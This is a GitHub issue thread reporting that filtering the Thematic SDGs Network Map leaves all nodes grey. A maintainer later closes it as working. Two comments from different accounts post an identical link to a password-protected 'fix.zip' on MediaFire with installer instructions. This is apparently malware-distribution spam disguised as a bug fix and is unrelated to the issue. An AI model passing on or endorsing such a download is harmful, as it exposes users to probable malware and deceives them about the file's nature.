### ISSUE TITLE
Thematic SDGS Network Map not filtering

### ISSUE THREAD

**Issue by SishaMish** [EventideSystems/tool_for_systemic_change#997]
## Describe the bug

When viewing the Thematic SDGs Network Map and filtering for organisation and/or initiative, all nodes turn grey and none are highlighted.

## To Reproduce

_Steps to reproduce the behavior:_

1. Go to SDGs Alignment Cards on the side menu
2. Click on a SDGs Alignment Card from the list
3. Click on Thematic SDGs Network Map tab
4. Select an Organisation from the drop down box
5. Thematic Map redraws and sets all nodes grey

## Expected behavior

When filtering for an organisation or initiative on the Thematic SDGs Network Map I expect to see the nodes highlighted that are connected to the filtered criteria, while the unconnected criteria remains greyed out.

## Screenshots

![Screenshot 2024-08-26 at 6 02 38 PM](https://github.com/user-attachments/assets/230ce7cd-1a51-4390-949f-5ceba5480bb0)

## Desktop (please complete the following information):

- OS: MacOS Sonoma 14.5
- Browser Chrome
- Version 127.0.6533.100

## Additional context

_Add any other context about the problem here._

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ferrisoxide** [comment]
@SishaMish This is on production and can be QA'ed there.

**Comment by ferrisoxide** [comment]
This appears to be working. Closing.
